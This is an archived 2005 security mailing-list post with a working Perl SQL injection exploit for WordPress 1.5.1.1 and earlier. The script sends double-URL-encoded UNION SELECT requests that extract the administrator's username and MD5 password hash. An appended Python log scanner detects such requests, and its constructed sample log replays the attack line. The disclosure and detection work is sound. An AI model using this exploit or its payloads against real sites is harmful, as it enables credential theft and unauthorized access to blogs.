SQL Injection Exploit for WordPress <= 1.5.1.1

From: Alberto Trivero (trivero_at_jumpy.it)
Date: 06/07/05

    To: <bugtraq@securityfocus.com>, <news@securiteam.com>, <submissions@packetstormsecurity.org>, <submit@milw0rm.com>, <vuln@frsirt.com>
    Date: Tue, 7 Jun 2005 21:40:50 +0200

    #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for WordPress <= 1.5.1.1
    # This exploit shows the username of the administrator of the blog and his
    # password crypted in MD5
    # Related advisory: http://www.securityfocus.com/archive/1/401597/30/0/threaded
    # Patch: Download the last version at http://wordpress.org/download/
    # Coded by Alberto Trivero

    use LWP::Simple;

    print "\n\t======================================\n";
    print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
    print "\t= Alberto Trivero - codebug.org =\n";
    print "\t======================================\n\n";

    if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
       print "Usage:\nperl $0 [full_target_path]\n\n";
       print "Examples:\nperl $0 http://www.example.com/wordpress/\n";
       exit(0);
    }

    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_login%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
    print "[+] Connected to: $ARGV[0]\n";
    $page=~m/<title>.*?&raquo; (.*?)<\/title>/ && print "[+] Username of administrator is: $1\n";
    print "[-] Unable to retrieve username\n" if(!$1);
    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_pass%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
    $page=~m/<title>.*?&raquo; (.*?)<\/title>/ && print "[+] MD5 hash of password is: $1\n";
    print "[-] Unable to retrieve hash of password\n" if(!$1);
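The payload above hides its single quote as %2527: one URL-decoding round turns it into %27, which carries no quote for input escaping to catch, and only a second decode yields the literal quote. From the defender's side, the observable signal in web server logs is a query-string value that keeps changing under repeated URL decoding and contains SQL keywords once fully decoded. The following Python is an added example written for this page, not code from the original post or from WordPress; the log lines, IP addresses and user agents are constructed, and the assumption that a second decoding round happens server-side is drawn from the shape of the payload, not from WordPress source.

```python
"""Flag double-URL-encoded SQL injection attempts in web access logs.

Added example, not part of the original post. The single quote in the
exploit above is sent as %2527 so that it survives one decode as %27 and
only becomes ' on a second decode. This scanner decodes each query value
until it stops changing, counts the rounds, and looks for SQL keywords in
the fully decoded result. All sample data below is constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined-log format (not real traffic).
# Line 1 mirrors the request the exploit above sends; lines 2 and 3 are
# benign: a plain category id and a once-encoded UTF-8 search string.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jun/2005:21:40:50 +0200] "GET /wordpress/index.php?cat=%2527%20UNION%20SELECT%20user_login%20FROM%20wp_users/* HTTP/1.1" 200 5120 "-" "libwww-perl/5.803"
198.51.100.7 - - [07/Jun/2005:21:41:02 +0200] "GET /wordpress/index.php?cat=3 HTTP/1.1" 200 7811 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Jun/2005:21:41:30 +0200] "GET /wordpress/index.php?s=caf%C3%A9%20%26%20bar HTTP/1.1" 200 6020 "-" "Mozilla/5.0"
"""

# Combined-log prefix: client, identd, user, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Keywords that rarely belong in a category id or search term.
SQL_PATTERN = re.compile(
    r"\b(union\s+(all\s+)?select|select\s+.+\s+from|information_schema)\b",
    re.IGNORECASE,
)
MAX_ROUNDS = 5  # guard against pathological inputs that never stabilise


def fully_decode(value):
    """Decode until stable; return (decoded_value, rounds_that_changed_it).

    A value the server decodes exactly once yields rounds == 1 (or 0 if it
    had no percent-escapes at all); rounds >= 2 means double encoding.
    """
    current = value
    rounds = 0
    for _ in range(MAX_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def split_query(target):
    """Split the request target's query into (name, raw_value) pairs.

    Values are left percent-encoded so fully_decode() can count rounds;
    '+' is normalised to a space as form encoding requires.
    """
    pairs = []
    for part in urlsplit(target).query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote(name), value.replace("+", " ")))
    return pairs


def analyze_target(target):
    """Return findings for one request target; empty list if nothing odd."""
    findings = []
    for name, raw_value in split_query(target):
        decoded, rounds = fully_decode(raw_value)
        sql_hit = SQL_PATTERN.search(decoded) is not None
        if rounds >= 2 or sql_hit:
            findings.append({
                "param": name,
                "decoded": decoded,
                "decode_rounds": rounds,
                "double_encoded": rounds >= 2,
                "sql_keywords": sql_hit,
            })
    return findings


def scan_log(text):
    """Parse combined-log lines and return one alert per suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        findings = analyze_target(match.group("target"))
        if findings:
            alerts.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "target": match.group("target"),
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for f in alert["findings"]:
            print(f"[ALERT] {alert['ip']} {alert['ts']} param={f['param']!r} "
                  f"rounds={f['decode_rounds']} double_encoded={f['double_encoded']} "
                  f"sql_keywords={f['sql_keywords']} decoded={f['decoded']!r}")
```

Only the first constructed line is reported: its cat value needs two decoding rounds and contains UNION SELECT once decoded, while the UTF-8 search term decodes in a single round and carries no SQL keywords. Double encoding on its own is a weak signal (a legitimate value containing a literal "%25xx" string also decodes twice), so the two flags are kept separate in each finding and a rule can require both before paging anyone.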
